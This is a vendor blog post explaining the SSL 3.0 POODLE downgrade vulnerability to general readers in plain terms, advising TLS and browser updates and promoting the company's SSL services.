Discussion – 


SSL 3.0 POODLE Vulnerability

SSL 3.0 POODLEHave you ever used Wi-Fi in a coffee shop, restaurant, or public areas? In a perfect world we could browse the web freely and securely without any worries that the personal information we are sending does not end up in the wrong hands. Unfortunately, we don’t live in a perfect world and anytime you are connected to a public Wi-Fi you need to be aware of the dangers out there.

SSL encryption is extremely important because it prevents eavesdropping and secures the personal information that we are sending. Once a hacker has access to your information they can take anything they want including bank passwords, credit card numbers, and more. A properly working SSL is supposed to encrypt your communications in order to block these malicious people from stealing your private information.

Google recently revealed a design flaw in SSL 3.0 they call POODLE (Padding Oracle On Downgraded Legacy Encryption) which could affect all major browsers. SSL 3.0 is almost 15 years old but all browsers still use it as a workaround for bugs in HTTPS servers. Google security expert Bodo Möller explained “Because a network attacker can cause connection failures, they can trigger the use of SSL 3.0 and then exploit this issue.” Because POODLE only works when SSL 3.0 is being used, an attacker can force the downgrade within the browser by preventing the initial connection from taking place. The SSL 3.0 encryption is easily cracked and the attacker can then intercept and decrypt secure cookies.

The only way to solve this issue is to discontinue the use of SSL 3.0 and force the use of TLS (Transport Layer Security), which is immune to POODLE, making it the best option. Google also recommends using TLS_FALLBACK_SCSV which will block protocol downgrades. This tactic will be more effective than disabling SSL 3.0 altogether.

Google ensures you that their Chrome browser is safe but Mozilla warns they themselves are vulnerable. Mozilla plans to address the issue with their next release in Firefox 34. Because the permanent fix will not be available until Mozilla’s November 25th release, users with outdated versions can use a temporary solution provided by their organization. This vulnerability also affects earlier versions of Internet Explorer, especially IE 6.

Attacks and vulnerabilities are inevitable, but staying up to date with the latest news and ensuring your systems are up to date can help prevent information compromises. This specific attack will not allow the attacker to get your passwords but they will be able to gain access to your email, Facebook, pictures, or do whatever they like with your finances. No one wants to have their personal life exposed. Next time you are using free Wi-Fi in a public place, such as coffee shops, restaurants, or bars make sure the sites you are connected to are SSL or TLS compliant. Otherwise look around because the person next to you could know you more intimately than your loved ones.

RedOrum can provide proper configurations and SSL services to help mitigate POODLE. For more information contact us.

You May Also Like